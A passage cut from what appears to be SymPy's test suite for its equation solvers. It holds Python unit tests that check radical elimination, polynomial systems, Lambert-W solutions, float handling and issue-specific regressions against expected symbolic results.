solve(eqs, sym, rational=False, check=False, simplify=False)) == 2
def test_issue_2668():
assert set(solve([x**2 + y + 4], [x])) == \
set([(-sqrt(-y - 4),), (sqrt(-y - 4),)])
def test_polysys():
assert set(solve([x**2 + 2/y - 2, x + y - 3], [x, y])) == \
set([(S(1), S(2)), (1 + sqrt(5), 2 - sqrt(5)),
(1 - sqrt(5), 2 + sqrt(5))])
assert solve([x**2 + y - 2, x**2 + y]) == []
# the ordering should be whatever the user requested
assert solve([x**2 + y - 3, x - y - 4], (x, y)) != solve([x**2 +
y - 3, x - y - 4], (y, x))
def test_unrad():
s = symbols('s', cls=Dummy)
# checkers to deal with possibility of answer coming
# back with a sign change (cf issue 2104)
def check(rv, ans):
rv, ans = list(rv), list(ans)
rv[0] = rv[0].expand()
ans[0] = ans[0].expand()
return rv[0] in [ans[0], -ans[0]] and rv[1:] == ans[1:]
def s_check(rv, ans):
# get the dummy
rv = list(rv)
d = rv[0].atoms(Dummy)
reps = list(zip(d, [s]*len(d)))
# replace s with this dummy
rv = (rv[0].subs(reps).expand(), [(p[0].subs(reps), p[1].subs(reps))
for p in rv[1]],
[a.subs(reps) for a in rv[2]])
ans = (ans[0].subs(reps).expand(), [(p[0].subs(reps), p[1].subs(reps))
for p in ans[1]],
[a.subs(reps) for a in ans[2]])
return str(rv[0]) in [str(ans[0]), str(-ans[0])] and \
str(rv[1:]) == str(ans[1:])
assert check(unrad(sqrt(x)),
(x, [], []))
assert check(unrad(sqrt(x) + 1),
(x - 1, [], []))
assert s_check(unrad(sqrt(x) + x**Rational(1, 3) + 2),
(2 + s**2 + s**3, [(s, x - s**6)], []))
assert check(unrad(sqrt(x)*x**Rational(1, 3) + 2),
(x**5 - 64, [], []))
assert check(unrad(sqrt(x) + (x + 1)**Rational(1, 3)),
(x**3 - (x + 1)**2, [], []))
assert check(unrad(sqrt(x) + sqrt(x + 1) + sqrt(2*x)),
(-2*sqrt(2)*x - 2*x + 1, [], []))
assert check(unrad(sqrt(x) + sqrt(x + 1) + 2),
(16*x - 9, [], []))
assert check(unrad(sqrt(x) + sqrt(x + 1) + sqrt(1 - x)),
(-4*x + 5*x**2, [], []))
assert check(unrad(a*sqrt(x) + b*sqrt(x) + c*sqrt(y) + d*sqrt(y)),
((a*sqrt(x) + b*sqrt(x))**2 - (c*sqrt(y) + d*sqrt(y))**2, [], []))
assert check(unrad(sqrt(x) + sqrt(1 - x)),
(2*x - 1, [], []))
assert check(unrad(sqrt(x) + sqrt(1 - x) - 3),
(9*x + (x - 5)**2 - 9, [], []))
assert check(unrad(sqrt(x) + sqrt(1 - x) + sqrt(2 + x)),
(-5*x**2 + 2*x - 1, [], []))
assert check(unrad(sqrt(x) + sqrt(1 - x) + sqrt(2 + x) - 3),
(-25*x**4 - 376*x**3 - 1256*x**2 + 2272*x - 784, [], []))
assert check(unrad(sqrt(x) + sqrt(1 - x) + sqrt(2 + x) - sqrt(1 - 2*x)),
(-41*x**4 - 40*x**3 - 232*x**2 + 160*x - 16, [], []))
assert check(unrad(sqrt(x) + sqrt(x + 1)), (S(1), [], []))
eq = sqrt(x) + sqrt(x + 1) + sqrt(1 - sqrt(x))
assert check(unrad(eq),
(16*x**3 - 9*x**2, [], []))
assert set(solve(eq, check=False)) == set([S(0), S(9)/16])
assert solve(eq) == []
# but this one really does have those solutions
assert set(solve(sqrt(x) - sqrt(x + 1) + sqrt(1 - sqrt(x)))) == \
set([S.Zero, S(9)/16])
'''NOTE
real_root changes the value of the result if the solution is
simplified; `a` in the text below is the root that is not 4/5:
>>> eq
sqrt(x) + sqrt(-x + 1) + sqrt(x + 1) - 6*sqrt(5)/5
>>> eq.subs(x, a).n()
-0.e-123 + 0.e-127*I
>>> real_root(eq.subs(x, a)).n()
-0.e-123 + 0.e-127*I
>>> (eq.subs(x,simplify(a))).n()
-0.e-126
>>> real_root(eq.subs(x, simplify(a))).n()
0.194825975605452 + 2.15093623885838*I
>>> sqrt(x).subs(x, real_root(a)).n()
0.809823827278194 - 0.e-25*I
>>> sqrt(x).subs(x, (a)).n()
0.809823827278194 - 0.e-25*I
>>> sqrt(x).subs(x, simplify(a)).n()
0.809823827278194 - 5.32999467690853e-25*I
>>> sqrt(x).subs(x, real_root(simplify(a))).n()
0.49864610868139 + 1.44572604257047*I
'''
eq = (sqrt(x) + sqrt(x + 1) + sqrt(1 - x) - 6*sqrt(5)/5)
ra = S('''-1484/375 - 4*(-1/2 + sqrt(3)*I/2)*(-12459439/52734375 +
114*sqrt(12657)/78125)**(1/3) - 172564/(140625*(-1/2 +
sqrt(3)*I/2)*(-12459439/52734375 + 114*sqrt(12657)/78125)**(1/3))''')
rb = S(4)/5
ans = solve(sqrt(x) + sqrt(x + 1) + sqrt(1 - x) - 6*sqrt(5)/5)
assert all(abs(eq.subs(x, i).n()) < 1e-10 for i in (ra, rb)) and \
len(ans) == 2 and \
set([i.n(chop=True) for i in ans]) == \
set([i.n(chop=True) for i in (ra, rb)])
raises(ValueError, lambda:
unrad(-root(x,3)**2 + 2**pi*root(x,3) - x + 2**pi))
raises(ValueError, lambda:
unrad(sqrt(x) + sqrt(x + 1) + sqrt(1 - sqrt(x)) + 3))
raises(ValueError, lambda:
unrad(sqrt(x) + (x + 1)**Rational(1, 3) + 2*sqrt(y)))
# same as last but consider only y
assert check(unrad(sqrt(x) + (x + 1)**Rational(1, 3) + 2*sqrt(y), y),
(4*y - (sqrt(x) + (x + 1)**(S(1)/3))**2, [], []))
assert check(unrad(sqrt(x/(1 - x)) + (x + 1)**Rational(1, 3)),
(x**3/(-x + 1)**3 - (x + 1)**2, [], [(-x + 1)**3]))
# same as last but consider only y; no y-containing denominators now
assert s_check(unrad(sqrt(x/(1 - x)) + 2*sqrt(y), y),
(x/(-x + 1) - 4*y, [], []))
assert check(unrad(sqrt(x)*sqrt(1 - x) + 2, x),
(x*(-x + 1) - 4, [], []))
# http://tutorial.math.lamar.edu/
# Classes/Alg/SolveRadicalEqns.aspx#Solve_Rad_Ex2_a
assert solve(Eq(x, sqrt(x + 6))) == [3]
assert solve(Eq(x + sqrt(x - 4), 4)) == [4]
assert solve(Eq(1, x + sqrt(2*x - 3))) == []
assert set(solve(Eq(sqrt(5*x + 6) - 2, x))) == set([-S(1), S(2)])
assert set(solve(Eq(sqrt(2*x - 1) - sqrt(x - 4), 2))) == set([S(5), S(13)])
assert solve(Eq(sqrt(x + 7) + 2, sqrt(3 - x))) == [-6]
# http://www.purplemath.com/modules/solverad.htm
assert solve((2*x - 5)**Rational(1, 3) - 3) == [16]
assert solve((x**3 - 3*x**2)**Rational(1, 3) + 1 - x) == []
assert set(solve(x + 1 - (x**4 + 4*x**3 - x)**Rational(1, 4))) == \
set([-S(1)/2, -S(1)/3])
assert set(solve(sqrt(2*x**2 - 7) - (3 - x))) == set([-S(8), S(2)])
assert solve(sqrt(2*x + 9) - sqrt(x + 1) - sqrt(x + 4)) == [0]
assert solve(sqrt(x + 4) + sqrt(2*x - 1) - 3*sqrt(x - 1)) == [5]
assert solve(sqrt(x)*sqrt(x - 7) - 12) == [16]
assert solve(sqrt(x - 3) + sqrt(x) - 3) == [4]
assert solve(sqrt(9*x**2 + 4) - (3*x + 2)) == [0]
assert solve(sqrt(x) - 2 - 5) == [49]
assert solve(sqrt(x - 3) - sqrt(x) - 3) == []
assert solve(sqrt(x - 1) - x + 7) == [10]
assert solve(sqrt(x - 2) - 5) == [27]
assert solve(sqrt(17*x - sqrt(x**2 - 5)) - 7) == [3]
assert solve(sqrt(x) - sqrt(x - 1) + sqrt(sqrt(x))) == []
# don't posify the expression in unrad and use _mexpand
z = sqrt(2*x + 1)/sqrt(x) - sqrt(2 + 1/x)
p = posify(z)[0]
assert solve(p) == []
assert solve(z) == []
assert solve(z + 6*I) == [-S(1)/11]
assert solve(p + 6*I) == []
eq = sqrt(2 + I) + 2*I
assert unrad(eq - x, x, all=True) == (x**4 + 4*x**2 + 8*x + 37, [], [])
ans = (81*x**8 - 2268*x**6 - 4536*x**5 + 22644*x**4 + 63216*x**3 -
31608*x**2 - 189648*x + 141358, [], [])
r = sqrt(sqrt(2)/3 + 7)
eq = sqrt(r) + r - x
assert unrad(eq, all=1)
r2 = sqrt(sqrt(2) + 21)/sqrt(3)
assert r != r2 and r.equals(r2)
assert unrad(eq - r + r2, all=True) == ans
@slow
def test_unrad_slow():
ans = solve(sqrt(x) + sqrt(x + 1) -
sqrt(1 - x) - sqrt(2 + x))
assert len(ans) == 1 and NS(ans[0])[:4] == '0.73'
# the fence optimization problem
# http://code.google.com/p/sympy/issues/detail?id=1694#c159
F = Symbol('F')
eq = F - (2*x + 2*y + sqrt(x**2 + y**2))
X = solve(eq, x, hint='minimal')[0]
Y = solve((x*y).subs(x, X).diff(y), y, simplify=False, minimal=True)
ans = 2*F/7 - sqrt(2)*F/14
assert any((a - ans).expand().is_zero for a in Y)
eq = S('''
-x + (1/2 - sqrt(3)*I/2)*(3*x**3/2 - x*(3*x**2 - 34)/2 + sqrt((-3*x**3
+ x*(3*x**2 - 34) + 90)**2/4 - 39304/27) - 45)**(1/3) + 34/(3*(1/2 -
sqrt(3)*I/2)*(3*x**3/2 - x*(3*x**2 - 34)/2 + sqrt((-3*x**3 + x*(3*x**2
- 34) + 90)**2/4 - 39304/27) - 45)**(1/3))''')
raises(NotImplementedError, lambda: solve(eq)) # not other code errors
def test__invert():
assert _invert(x - 2) == (2, x)
assert _invert(2) == (2, 0)
assert _invert(exp(1/x) - 3, x) == (1/log(3), x)
assert _invert(exp(1/x + a/x) - 3, x) == ((a + 1)/log(3), x)
assert _invert(a, x) == (a, 0)
def test_issue_1364():
assert solve(-a*x + 2*x*log(x), x) == [exp(a/2)]
assert solve(a/x + exp(x/2), x) == [2*LambertW(-a/2)]
assert solve(x**x) == []
assert solve(x**x - 2) == [exp(LambertW(log(2)))]
assert solve(((x - 3)*(x - 2))**((x - 3)*(x - 4))) == [2]
assert solve(
(a/x + exp(x/2)).diff(x), x) == [4*LambertW(sqrt(2)*sqrt(a)/4)]
def test_issue_2015():
a, b, c, d, e, f, g, h, i, j, k, l, m, n, o, p, q, r = symbols('a:r')
# there is no 'a' in the equation set but this is how the
# problem was originally posed
syms = a, b, c, f, h, k, n
eqs = [b + r/d - c/d,
c*(1/d + 1/e + 1/g) - f/g - r/d,
f*(1/g + 1/i + 1/j) - c/g - h/i,
h*(1/i + 1/l + 1/m) - f/i - k/m,
k*(1/m + 1/o + 1/p) - h/m - n/p,
n*(1/p + 1/q) - k/p]
assert len(solve(eqs, syms, manual=True, check=False, simplify=False)) == 1
def test_misc():
# make sure that the right variables is picked up in tsolve
raises(NotImplementedError, lambda: solve((exp(x) + 1)**x))
def test_issue_2750():
I1, I2, I3, I4, I5, I6 = symbols('I1:7')
dI1, dI4, dQ2, dQ4, Q2, Q4 = symbols('dI1,dI4,dQ2,dQ4,Q2,Q4')
e = (
I1 - I2 - I3,
I3 - I4 - I5,
I4 + I5 - I6,
-I1 + I2 + I6,
-2*I1 - 2*I3 - 2*I5 - 3*I6 - dI1/2 + 12,
-I4 + dQ4,
-I2 + dQ2,
2*I3 + 2*I5 + 3*I6 - Q2,
I4 - 2*I5 + 2*Q4 + dI4
)
ans = [{
dQ4: I3 - I5,
dI1: -4*I2 - 8*I3 - 4*I5 - 6*I6 + 24,
I4: I3 - I5,
dQ2: I2,
Q2: 2*I3 + 2*I5 + 3*I6,
I1: I2 + I3,
Q4: -I3/2 + 3*I5/2 - dI4/2}]
assert solve(e, I1, I4, Q2, Q4, dI1, dI4, dQ2, dQ4, manual=True) == ans
# the matrix solver (tested below) doesn't like this because it produces
# a zero row in the matrix. Is this related to issue 1452?
assert [ei.subs(
ans[0]) for ei in e] == [0, 0, I3 - I6, -I3 + I6, 0, 0, 0, 0, 0]
def test_2750_matrix():
'''Same as test_2750 but solved with the matrix solver.'''
I1, I2, I3, I4, I5, I6 = symbols('I1:7')
dI1, dI4, dQ2, dQ4, Q2, Q4 = symbols('dI1,dI4,dQ2,dQ4,Q2,Q4')
e = (
I1 - I2 - I3,
I3 - I4 - I5,
I4 + I5 - I6,
-I1 + I2 + I6,
-2*I1 - 2*I3 - 2*I5 - 3*I6 - dI1/2 + 12,
-I4 + dQ4,
-I2 + dQ2,
2*I3 + 2*I5 + 3*I6 - Q2,
I4 - 2*I5 + 2*Q4 + dI4
)
assert solve(e, I1, I4, Q2, Q4, dI1, dI4, dQ2, dQ4) == {
dI4: -I3 + 3*I5 - 2*Q4,
dI1: -4*I2 - 8*I3 - 4*I5 - 6*I6 + 24,
dQ2: I2,
I1: I2 + I3,
Q2: 2*I3 + 2*I5 + 3*I6,
dQ4: I3 - I5,
I4: I3 - I5}
def test_issue_2802():
f, g, h = map(Function, 'fgh')
a = Symbol('a')
D = Derivative(f(x), x)
G = Derivative(g(a), a)
assert solve(f(x) + f(x).diff(x), f(x)) == \
[-D]
assert solve(f(x) - 3, f(x)) == \
[3]
assert solve(f(x) - 3*f(x).diff(x), f(x)) == \
[3*D]
assert solve([f(x) - 3*f(x).diff(x)], f(x)) == \
{f(x): 3*D}
assert solve([f(x) - 3*f(x).diff(x), f(x)**2 - y + 4], f(x), y) == \
[{f(x): 3*D, y: 9*D**2 + 4}]
assert solve(-f(a)**2*g(a)**2 + f(a)**2*h(a)**2 + g(a).diff(a),
h(a), g(a), set=True) == \
([g(a)], set([
(-sqrt(h(a)**2 + G/f(a)**2),),
(sqrt(h(a)**2 + G/f(a)**2),)]))
args = [f(x).diff(x, 2)*(f(x) + g(x)) - g(x)**2 + 2, f(x), g(x)]
assert set(solve(*args)) == \
set([(-sqrt(2), sqrt(2)), (sqrt(2), -sqrt(2))])
eqs = [f(x)**2 + g(x) - 2*f(x).diff(x), g(x)**2 - 4]
assert solve(eqs, f(x), g(x), set=True) == \
([f(x), g(x)], set([
(-sqrt(2*D - 2), S(2)),
(sqrt(2*D - 2), S(2)),
(-sqrt(2*D + 2), -S(2)),
(sqrt(2*D + 2), -S(2))]))
# the underlying problem was in solve_linear that was not masking off
# anything but a Mul or Add; it now raises an error if it gets anything
# but a symbol and solve handles the substitutions necessary so solve_linear
# won't make this error
raises(
ValueError, lambda: solve_linear(f(x) + f(x).diff(x), symbols=[f(x)]))
assert solve_linear(f(x) + f(x).diff(x), symbols=[x]) == \
(f(x) + Derivative(f(x), x), 1)
assert solve_linear(f(x) + Integral(x, (x, y)), symbols=[x]) == \
(f(x) + Integral(x, (x, y)), 1)
assert solve_linear(f(x) + Integral(x, (x, y)) + x, symbols=[x]) == \
(x + f(x) + Integral(x, (x, y)), 1)
assert solve_linear(f(y) + Integral(x, (x, y)) + x, symbols=[x]) == \
(x, -f(y) - Integral(x, (x, y)))
assert solve_linear(x - f(x)/a + (f(x) - 1)/a, symbols=[x]) == \
(x, 1/a)
assert solve_linear(x + Derivative(2*x, x)) == \
(x, -2)
assert solve_linear(x + Integral(x, y), symbols=[x]) == \
(x, 0)
assert solve_linear(x + Integral(x, y) - 2, symbols=[x]) == \
(x, 2/(y + 1))
assert set(solve(x + exp(x)**2, exp(x))) == \
set([-sqrt(-x), sqrt(-x)])
assert solve(x + exp(x), x, implicit=True) == \
[-exp(x)]
assert solve(cos(x) - sin(x), x, implicit=True) == []
assert solve(x - sin(x), x, implicit=True) == \
[sin(x)]
assert solve(x**2 + x - 3, x, implicit=True) == \
[-x**2 + 3]
assert solve(x**2 + x - 3, x**2, implicit=True) == \
[-x + 3]
def test_issue_2813():
assert set(solve(x**2 - x - 0.1, rational=True)) == \
set([S(1)/2 + sqrt(35)/10, -sqrt(35)/10 + S(1)/2])
# [-0.0916079783099616, 1.09160797830996]
ans = solve(x**2 - x - 0.1, rational=False)
assert len(ans) == 2 and all(a.is_Number for a in ans)
ans = solve(x**2 - x - 0.1)
assert len(ans) == 2 and all(a.is_Number for a in ans)
def test_float_handling():
def test(e1, e2):
return len(e1.atoms(Float)) == len(e2.atoms(Float))
assert solve(x - 0.5, rational=True)[0].is_Rational
assert solve(x - 0.5, rational=False)[0].is_Float
assert solve(x - S.Half, rational=False)[0].is_Rational
assert solve(x - 0.5, rational=None)[0].is_Float
assert solve(x - S.Half, rational=None)[0].is_Rational
assert test(nfloat(1 + 2*x), 1.0 + 2.0*x)
for contain in [list, tuple, set]:
ans = nfloat(contain([1 + 2*x]))
assert type(ans) is contain and test(list(ans)[0], 1.0 + 2.0*x)
k, v = list(nfloat({2*x: [1 + 2*x]}).items())[0]
assert test(k, 2*x) and test(v[0], 1.0 + 2.0*x)
assert test(nfloat(cos(2*x)), cos(2.0*x))
assert test(nfloat(3*x**2), 3.0*x**2)
assert test(nfloat(3*x**2, exponent=True), 3.0*x**2.0)
assert test(nfloat(exp(2*x)), exp(2.0*x))
assert test(nfloat(x/3), x/3.0)
assert test(nfloat(x**4 + 2*x + cos(S(1)/3) + 1),
x**4 + 2.0*x + 1.94495694631474)
# don't call nfloat if there is no solution
tot = 100 + c + z + t
assert solve(((.7 + c)/tot - .6, (.2 + z)/tot - .3, t/tot - .1)) == []
def test_check_assumptions():
x = symbols('x', positive=True)
assert solve(x**2 - 1) == [1]
def test_solve_abs():
assert set(solve(abs(x - 7) - 8)) == set([-S(1), S(15)])
r = symbols('r', real=True)
raises(NotImplementedError, lambda: solve(2*abs(r) - abs(r - 1)))
def test_issue_2957():
assert solve(tanh(x + 3)*tanh(x - 3) - 1) == []
assert set([simplify(w) for w in solve(tanh(x - 1)*tanh(x + 1) + 1)]) == set([
-log(2)/2 + log(1 - I),
-log(2)/2 + log(-1 - I),
-log(2)/2 + log(1 + I),
-log(2)/2 + log(-1 + I),])
assert set([simplify(w) for w in solve((tanh(x + 3)*tanh(x - 3) + 1)**2)]) == set([
-log(2)/2 + log(1 - I),
-log(2)/2 + log(-1 - I),
-log(2)/2 + log(1 + I),
-log(2)/2 + log(-1 + I),])
def test_issue_2961():
x = Symbol('x')
absxm3 = Piecewise(
(x - 3, S(0) <= x - 3),
(3 - x, S(0) > x - 3)
)
y = Symbol('y')
assert solve(absxm3 - y, x) == [
Piecewise((-y + 3, S(0) > -y), (S.NaN, True)),
Piecewise((y + 3, S(0) <= y), (S.NaN, True))
]
y = Symbol('y', positive=True)
assert solve(absxm3 - y, x) == [-y + 3, y + 3]
def test_issue_2574():
eq = -x + exp(exp(LambertW(log(x)))*LambertW(log(x)))
assert checksol(eq, x, 2) is True
assert checksol(eq, x, 2, numerical=False) is None
def test_exclude():
R, C, Ri, Vout, V1, Vminus, Vplus, s = \
symbols('R, C, Ri, Vout, V1, Vminus, Vplus, s')
Rf = symbols('Rf', positive=True) # to eliminate Rf = 0 soln
eqs = [C*V1*s + Vplus*(-2*C*s - 1/R),
Vminus*(-1/Ri - 1/Rf) + Vout/Rf,
C*Vplus*s + V1*(-C*s - 1/R) + Vout/R,
-Vminus + Vplus]
assert solve(eqs, exclude=s*C*R) == [
{
Rf: Ri*(C*R*s + 1)**2/(C*R*s),
Vminus: Vplus,
V1: Vplus*(2*C*R*s + 1)/(C*R*s),
Vout: Vplus*(C**2*R**2*s**2 + 3*C*R*s + 1)/(C*R*s)},
{
Vplus: 0,
Vminus: 0,
V1: 0,
Vout: 0},
]
# TODO: Investingate why currently solution [0] is preferred over [1].
assert solve(eqs, exclude=[Vplus, s, C]) in [[{
Vminus: Vplus,
V1: Vout/2 + Vplus/2 + sqrt((Vout - 5*Vplus)*(Vout - Vplus))/2,
R: (Vout - 3*Vplus - sqrt(Vout**2 - 6*Vout*Vplus + 5*Vplus**2))/(2*C*Vplus*s),
Rf: Ri*(Vout - Vplus)/Vplus,
}, {
Vminus: Vplus,
V1: Vout/2 + Vplus/2 - sqrt((Vout - 5*Vplus)*(Vout - Vplus))/2,
R: (Vout - 3*Vplus + sqrt(Vout**2 - 6*Vout*Vplus + 5*Vplus**2))/(2*C*Vplus*s),
Rf: Ri*(Vout - Vplus)/Vplus,
}], [{
Vminus: Vplus,
Vout: (V1**2 - V1*Vplus - Vplus**2)/(V1 - 2*Vplus),
Rf: Ri*(V1 - Vplus)**2/(Vplus*(V1 - 2*Vplus)),
R: Vplus/(C*s*(V1 - 2*Vplus)),
}]]
def test_high_order_roots():
s = x**5 + 4*x**3 + 3*x**2 + S(7)/4
assert set(solve(s)) == set(Poly(s*4, domain='ZZ').all_roots())
def test_minsolve_linear_system():
def count(dic):
return len([x for x in dic.values() if x == 0])
assert count(solve([x + y + z, y + z + a + t], particular=True, quick=True)) \
== 3
assert count(solve([x + y + z, y + z + a + t], particular=True, quick=False)) \
== 3
assert count(solve([x + y + z, y + z + a], particular=True, quick=True)) == 1
assert count(solve([x + y + z, y + z + a], particular=True, quick=False)) == 2
def test_real_roots():
# cf. issue 3551
x = Symbol('x', real=True)
assert len(solve(x**5 + x**3 + 1)) == 1
@slow
def test_issue3429():
eqs = [
327600995*x**2 - 37869137*x + 1809975124*y**2 - 9998905626,
895613949*x**2 - 273830224*x*y + 530506983*y**2 - 10000000000]
assert len(solve(eqs, y, x)) == len(solve(eqs, y, x, manual=True)) == 4
def test_overdetermined():
eqs = [Abs(4*x - 7) - 5, Abs(3 - 8*x) - 1]
assert solve(eqs, x) == [(S.Half,)]
assert solve(eqs, x, manual=True) == [(S.Half,)]
assert solve(eqs, x, manual=True, check=False) == [(S.Half/2,), (S.Half,)]
def test_issue_3506():
x = symbols('x')
assert solve(4**(x/2) - 2**(x/3)) == [0]
# while the first one passed, this one failed
x = symbols('x', real=True)
assert solve(5**(x/2) - 2**(x/3)) == [0]
b = sqrt(6)*sqrt(log(2))/sqrt(log(5))
assert solve(5**(x/2) - 2**(3/x)) == [-b, b]
def test__ispow():
assert _ispow(x**2)
assert not _ispow(x)
assert not _ispow(True)
def test_issue_3545():
eq = -sqrt((m - q)**2 + (-m/(2*q) + S(1)/2)**2) + sqrt((-m**2/2 - sqrt(
4*m**4 - 4*m**2 + 8*m + 1)/4 - S(1)/4)**2 + (m**2/2 - m - sqrt(
4*m**4 - 4*m**2 + 8*m + 1)/4 - S(1)/4)**2)
assert solve(eq, q) == [
m**2/2 - sqrt(4*m**4 - 4*m**2 + 8*m + 1)/4 - S(1)/4,
m**2/2 + sqrt(4*m**4 - 4*m**2 + 8*m + 1)/4 - S(1)/4]
def test_issue_3653():
assert solve([a**2 + a, a - b], [a, b]) == [(-1, -1), (0, 0)]
assert solve([a**2 + a*c, a - b], [a, b]) == [(0, 0), (-c, -c)]
def test_issue_3693():
assert solve(x*(x - 1)**2*(x + 1)*(x**6 - x + 1)) == [
-1, 0, 1, RootOf(x**6 - x + 1, 0), RootOf(x**6 - x + 1, 1),
RootOf(x**6 - x + 1, 2), RootOf(x**6 - x + 1, 3), RootOf(x**6 - x + 1, 4),
RootOf(x**6 - x + 1, 5)]
def test_issues_3720_3721_3722_3149():
# 3722
x, y = symbols('x y')
assert solve(abs(x + 3) - 2*abs(x - 3)) == [1, 9]
assert solve([abs(x) - 2, arg(x) - pi], x) == [
{re(x): -2, x: -2, im(x): 0}, {re(x): 2, x: 2, im(x): 0}]
assert solve([re(x) - 1, im(x) - 2], x) == [
{re(x): 1, x: 1 + 2*I, im(x): 2}]
w = symbols('w', integer=True)
assert solve(2*x**w - 4*y**w, w) == solve((x/y)**w - 2, w)
x, y = symbols('x y', real=True)
assert solve(x + y*I + 3) == {y: 0, x: -3}
# github issue 2642
assert solve(x*(1 + I)) == [0]
x, y = symbols('x y', imaginary=True)
assert solve(x + y*I + 3 + 2*I) == {x: -2*I, y: 3*I}
x = symbols('x', real=True)
assert solve(x + y + 3 + 2*I) == {x: -3, y: -2*I}
# issue 3149
f = Function('f')
assert solve(f(x + 1) - f(2*x - 1)) == [2]
assert solve(log(x + 1) - log(2*x - 1)) == [2]
x = symbols('x')
assert solve(2**x + 4**x) == [I*pi/log(2)]
def test_issue_3890():
f = Function('f')
assert solve(Eq(-f(x), Piecewise((1, x > 0), (0, True))), f(x)) == \
[Piecewise((-1, x > 0), (0, True))]
def test_lambert_multivariate():
from sympy.abc import a, x, y
from sympy.solvers.bivariate import _filtered_gens, _lambert, _solve_lambert
assert _filtered_gens(Poly(x + 1/x + exp(x) + y), x) == set([x, exp(x)])
assert _lambert(x, x) == []
assert solve((x**2 - 2*x + 1).subs(x, log(x) + 3*x)) == [LambertW(3*S.Exp1)/3]
assert solve((x**2 - 2*x + 1).subs(x, (log(x) + 3*x)**2 - 1)) == \
[LambertW(3*exp(-sqrt(2)))/3, LambertW(3*exp(sqrt(2)))/3]
assert solve((x**2 - 2*x - 2).subs(x, log(x) + 3*x)) == \
[LambertW(3*exp(1 + sqrt(3)))/3, LambertW(3*exp(-sqrt(3) + 1))/3]
assert solve(x*log(x) + 3*x + 1, x) == [exp(-3 + LambertW(-exp(3)))]
eq = (x*exp(x) - 3).subs(x, x*exp(x))
assert solve(eq) == [LambertW(3*exp(-LambertW(3)))]
# coverage test
raises(NotImplementedError, lambda: solve(x - sin(x)*log(y - x), x))
# if sign is unknown then only this one solution is obtained
assert solve(3*log(a**(3*x + 5)) + a**(3*x + 5), x) == [
-((log(a**5) + LambertW(S(1)/3))/(3*log(a)))] # tested numerically
p = symbols('p', positive=True)
assert solve(3*log(p**(3*x + 5)) + p**(3*x + 5), x) == [
log((-3**(S(1)/3) - 3**(S(5)/6)*I)*LambertW(S(1)/3)**(S(1)/3)/(2*p**(S(5)/3)))/log(p),
log((-3**(S(1)/3) + 3**(S(5)/6)*I)*LambertW(S(1)/3)**(S(1)/3)/(2*p**(S(5)/3)))/log(p),
log((3*LambertW(S(1)/3)/p**5)**(1/(3*log(p)))),] # checked numerically
# check collection
assert solve(3*log(a**(3*x + 5)) + b*log(a**(3*x + 5)) + a**(3*x + 5), x) == [
-((log(a**5) + LambertW(1/(b + 3)))/(3*log(a)))]
eq = 4*2**(2*p + 3) - 2*p - 3
assert _solve_lambert(eq, p, _filtered_gens(Poly(eq), p)) == [
-S(3)/2 - LambertW(-4*log(2))/(2*log(2))]
# issue 1172
assert solve((a/x + exp(x/2)).diff(x, 2), x) == [
6*LambertW((-1)**(S(1)/3)*a**(S(1)/3)/3)]
assert solve((log(x) + x).subs(x, x**2 + 1)) == [
-I*sqrt(-LambertW(1) + 1), sqrt(-1 + LambertW(1))]
# these only give one of the solutions (see XFAIL below)
assert solve(x**3 - 3**x, x) == [-3/log(3)*LambertW(-log(3)/3)]
# replacing 3 with 2 in the above solution gives 2
assert solve(x**2 - 2**x, x) == [2]
assert solve(-x**2 + 2**x, x) == [2]
assert solve(3**cos(x) - cos(x)**3) == [
acos(-3*LambertW(-log(3)/3)/log(3))]
@XFAIL
def test_other_lambert():
from sympy.abc import x
assert solve(3*sin(x) - x*sin(3), x) == [3]
assert set(solve(3*log(x) - x*log(3))) == set(
[3, -3*LambertW(-log(3)/3)/log(3)])
a = S(6)/5
assert set(solve(x**a - a**x)) == set(
[a, -a*LambertW(-log(a)/a)/log(a)])
assert set(solve(3**cos(x) - cos(x)**3)) == set(
[acos(3), acos(-3*LambertW(-log(3)/3)/log(3))])
assert set(solve(x**2 - 2**x)) == set(
[2, -2/log(2)*LambertW(log(2)/2)])
def test_rewrite_trig():
assert solve(sin(x) + tan(x)) == [0, 2*pi]
assert solve(sin(x) + sec(x)) == [
-2*atan(-S.Half + sqrt(2 - 2*sqrt(3)*I)/2 + sqrt(3)*I/2),
2*atan(S.Half - sqrt(3)*I/2 + sqrt(2 - 2*sqrt(3)*I)/2),
2*atan(S.Half - sqrt(2 + 2*sqrt(3)*I)/2 + sqrt(3)*I/2),
2*atan(S.Half + sqrt(2 + 2*sqrt(3)*I)/2 + sqrt(3)*I/2)]
assert solve(sinh(x) + tanh(x)) == [0, I*pi]
@XFAIL
def test_rewrite_trigh():
# if this import passes then the test below should also pass
from sympy import sech
assert solve(sinh(x) + sech(x)) == [
2*atanh(-S.Half + sqrt(5)/2 - sqrt(-2*sqrt(5) + 2)/2),
2*atanh(-S.Half + sqrt(5)/2 + sqrt(-2*sqrt(5) + 2)/2),
2*atanh(-sqrt(5)/2 - S.Half + sqrt(2 + 2*sqrt(5))/2),
2*atanh(-sqrt(2 + 2*sqrt(5))/2 - sqrt(5)/2 - S.Half)]
def test_uselogcombine():
eq = z - log(x) + log(y/(x*(-1 + y**2/x**2)))
assert solve(eq, x, force=True) == [-sqrt(y*(y - exp(z))), sqrt(y*(y - exp(z)))]
assert solve(log(x + 3) + log(1 + 3/x) - 3) == [
-3 + sqrt(-12 + exp(3))*exp(S(3)/2)/2 + exp(3)/2,
-sqrt(-12 + exp(3))*exp(S(3)/2)/2 - 3 + exp(3)/2]
def test_atan2():
assert solve(atan2(x, 2) - pi/3, x) == [2*sqrt(3)]
def test_errorinverses():
assert solve(erf(x)-y,x)==[erfinv(y)]
assert solve(erfinv(x)-y,x)==[erf(y)]
assert solve(erfc(x)-y,x)==[erfcinv(y)]
assert solve(erfcinv(x)-y,x)==[erfc(y)]
def test_misc():
# shouldn't generate a GeneratorsNeeded error in _tsolve when the NaN is generated
# for eq_down. Actual answers, as determined numerically are approx. +/- 0.83
assert solve(sinh(x)*sinh(sinh(x)) + cosh(x)*cosh(sinh(x)) - 3) is not None
# watch out for recursive loop in tsolve
raises(NotImplementedError, lambda: solve((x+2)**y*x-3,x))
def test_gh2725():
R = Symbol('R')
eq = sqrt(2)*R*sqrt(1/(R + 1)) + (R + 1)*(sqrt(2)*sqrt(1/(R + 1)) - 1)
sol = solve(eq, R, set=True)[1]
assert sol == set([(S(5)/3 + 40/(3*(251 + 3*sqrt(111)*I)**(S(1)/3)) +
(251 + 3*sqrt(111)*I)**(S(1)/3)/3,), ((-160 + (1 +
sqrt(3)*I)*(10 - (1 + sqrt(3)*I)*(251 +
3*sqrt(111)*I)**(S(1)/3))*(251 +
